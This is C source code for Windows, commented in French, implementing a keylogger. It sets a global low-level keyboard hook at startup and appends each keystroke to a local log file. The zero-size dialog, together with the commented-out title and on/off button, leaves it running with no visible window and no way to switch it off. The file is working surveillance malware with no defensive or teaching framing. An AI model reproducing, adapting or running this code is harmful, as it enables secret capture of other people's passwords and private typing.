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| // Ce code fonctionne sur Windows 2000, XP, ou NT4 SP3 et supérieur
#define _WIN32_WINNT 0x0400
#include <windows.h>
#include <string.h>
#include <stdio.h>
//------------------------------------------------------------------------------
// Variables Globales
//------------------------------------------------------------------------------
HHOOK HKEYBOARD; // Hook Clavier
HINSTANCE HInst; // Handle d'intance de la DLL
char LastWindowText[256]; // Nom de la fenêtre actuelle
char FILENAME[] = "FichierLog.txt"; // Chemin du log
HHOOK hHook; // Handle du hook global
HINSTANCE hExe; // Handle de notre exécutable
// Fonction de gestion du hook
__declspec(dllexport) LRESULT CALLBACK HookProc ( int nCode, WPARAM wParam, LPARAM lParam)
{
if ((nCode == HC_ACTION) && (wParam == WM_KEYDOWN))
{
// Structure de récupération d'infos sur la touche tapée
KBDLLHOOKSTRUCT hookstruct = *((KBDLLHOOKSTRUCT*)lParam);
// Obtenir la lettre de la touche tapée
char lettre=(char)hookstruct.vkCode;
// Compteur des octets écrits pour WriteFile()
DWORD Ecrits;
// Ouverture du fichier log. Le créer s'il n'existe pas.
HANDLE hFichier = CreateFile(FILENAME, GENERIC_WRITE, FILE_SHARE_READ, NULL,OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
// Si le handle retourné est valide alors
if( hFichier != INVALID_HANDLE_VALUE)
{
// Mettre le pointeur du fichier à la fin
SetFilePointer(hFichier,NULL,NULL,FILE_END);
// Ecrire la lettre dans le fihier log
WriteFile(hFichier,&lettre,1,&Ecrits,NULL);
// Fermer le fichier
CloseHandle(hFichier);
}
}
// Renvoi des messages au sytème pour permettre d'autres hooks
return CallNextHookEx(hHook, nCode, wParam, lParam);
}
//Fonction de la boite de dialogue
BOOL CALLBACK MainDlgProc( HWND hDlg, UINT msg, WPARAM wParam, LPARAM lParam )
{
static HWND hBouton;//Handle du bouton
static int etat;// Flag d'état du hook
switch( msg )
{
case WM_CLOSE: // Clic sur la croix de fermeture
// Fermeture de la boite de dialogue
EndDialog( hDlg, TRUE );
return 1;
case WM_INITDIALOG: //Initialisation de la boite de dialogue
// Création du bouton Activer/Désactiver
// hBouton = CreateWindow("BUTTON", "Activer le hook", WS_CHILD | WS_VISIBLE , 50, 35,140, 30, hDlg, 0, 0, 0);
// Obtenir le HANDLE de l'exécutable en cours
hExe = GetModuleHandle(NULL);
// Mettre le flag d'état à 0= Hook inactif
etat=0;
// Activer le hook
hHook = SetWindowsHookEx( WH_KEYBOARD_LL, (HOOKPROC) HookProc, hExe, NULL);
// Fin d'initialisation
return 1;
case WM_COMMAND: // Appui sur le bouton
if( lParam == (long) hBouton)
{
if (!etat)//Si hook inactif alors
{
// Activer le hook
hHook = SetWindowsHookEx( WH_KEYBOARD_LL, (HOOKPROC) HookProc, hExe, NULL);
//Mettre le flag d'etat à 1 (actif)
etat=1;
// Changer le texte du bouton
SetWindowText(hBouton,"Désactiver le hook");
}
else //Si hook actif alors
{
// Désactiver le hook
UnhookWindowsHookEx(hHook);
// Mettre le flag d'état à 0 (inactif)
etat=0;
// Changer le texte du bouton
SetWindowText(hBouton,"Activer le hook");
}
break;
}
}
return 0;
}
//Fonction principale: Création d'une boite de dialogue sans ressources
int APIENTRY WinMain( HINSTANCE hInstance, HINSTANCE hPrev, LPSTR lpCmd,int nShow )
{
// Allouer de la mem pour notre dialog template
LPDLGTEMPLATE lpdt = ( LPDLGTEMPLATE) GlobalAlloc(GPTR, 512);
if (!lpdt) return 1;
// Définir les propriétés de la boite de dialogue
lpdt->style = WS_POPUP;
lpdt->x = 100; lpdt->y = 100; lpdt->cx = 0; lpdt->cy = 0;
// Obtenir pointeur sur la zone du nom de la boite de dialogue
LPWSTR lpnom=(LPWSTR) (lpdt+1)+2;
// Convertir le nom en UNICODE et le mettre dans la zone nom
//MultiByteToWideChar (CP_ACP, 0, "Hook Global Sans DLL", -1, lpnom, 128);
// Lancer la boite de dialogue
DialogBoxIndirect(hInstance,lpdt,NULL,(DLGPROC)MainDlgProc);
// Libérer la mémoire allouée puis quitter
GlobalFree((HGLOBAL) lpdt);
return( FALSE );
} |